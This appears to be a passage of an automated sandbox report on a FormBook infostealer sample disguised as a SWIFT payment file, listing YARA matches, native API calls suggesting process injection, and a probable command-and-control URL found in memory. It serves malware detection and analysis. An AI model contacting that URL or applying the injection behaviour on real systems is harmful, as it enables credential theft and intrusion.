          Source: rundll32.exe, 00000015.00000002.470872978.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: https://www.fayansistanbul.com/q4kr/?4h_4=eOXhpEoLIa7YYnf6/8HRqFDyW

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.301061394.0000000003A29000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.358391118.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.465035906.0000000000250000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.467645501.0000000004190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.467412388.00000000029C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.358413416.0000000001130000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.301061394.0000000003A29000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.301061394.0000000003A29000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.358391118.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.358391118.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.465035906.0000000000250000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.465035906.0000000000250000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.467645501.0000000004190000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.467645501.0000000004190000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.467412388.00000000029C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.467412388.00000000029C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.358413416.0000000001130000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.358413416.0000000001130000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: SWIFT_MT103.exe, System.Windows.Forms/TabStyleProvider.csLong String: Length: 24686
          Source: 0.0.SWIFT_MT103.exe.690000.0.unpack, System.Windows.Forms/TabStyleProvider.csLong String: Length: 24686
          Source: 0.2.SWIFT_MT103.exe.690000.0.unpack, System.Windows.Forms/TabStyleProvider.csLong String: Length: 24686
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_004181D0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00418280 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00418300 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_004181CD NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_004182FA NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016599D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0165B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016598A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0165A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0165AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016595F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0165A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0165A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01659610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016596D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044395D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044396D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0443B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044398F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044398A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439560 NtWriteFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0443AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044399D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044395F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0443A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0443A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04439730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044397A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0443A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029D8280 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029D83B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029D8300 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029D81D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029D82FA NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029D83AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029D81CD NtCreateFile,
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_00692050
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_00FAC124
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_00FAE570
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_00FAE560
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B0040
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B5A70
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B8DA8
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B46B0
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B8778
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B3730
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B0F28
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B3060
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B9058
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B3050
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B9048
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B0012
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B380B
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B5168
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B3268
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B6A68
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B5A60
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B8A18
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B8A09
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087BB2B5
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B4B60
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B4B50
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B63E8
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B6448
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B2CC0
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B2CB0
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B3518
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B3513
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B3508
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B8D98
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B1E48
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B1E38
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B0E37
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B1E00
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B46A0
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B8769
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B5F58
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B3722
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00401174
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_004012FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0041A302
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0041CBDF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0041CBF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00408C6B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00408C70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0041B4B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00402D87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0041B67D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0041CF41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0041B76D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01634120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016420A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01610D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01642581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01636E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1002
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440841F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C28EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440B090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044220A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C20A8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C1D55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F0D20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FF900
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C2D07
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04414120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C25DD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04422581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04416E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C2EF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C22AE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C2B28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044BDBD2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C1FF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442EBB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029DCBDF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029DCBF8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029DA302
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029DB67D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029C2FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029DCF41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029DB4B6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029C8C70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029C8C6B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029C2D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029C2D87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0161B150 appears 35 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 043FB150 appears 35 times
          Source: SWIFT_MT103.exe, 00000000.00000002.310124036.0000000008AF0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs SWIFT_MT103.exe
          Source: SWIFT_MT103.exe, 00000000.00000002.289155708.0000000000746000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamec5ryJ02.exeB vs SWIFT_MT103.exe
          Source: SWIFT_MT103.exe, 00000000.00000002.309316141.0000000007470000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs SWIFT_MT103.exe
          Source: SWIFT_MT103.exeBinary or memory string: OriginalFilenamec5ryJ02.exeB vs SWIFT_MT103.exe
          Source: SWIFT_MT103.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.301061394.0000000003A29000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.301061394.0000000003A29000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.358391118.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.358391118.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.465035906.0000000000250000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
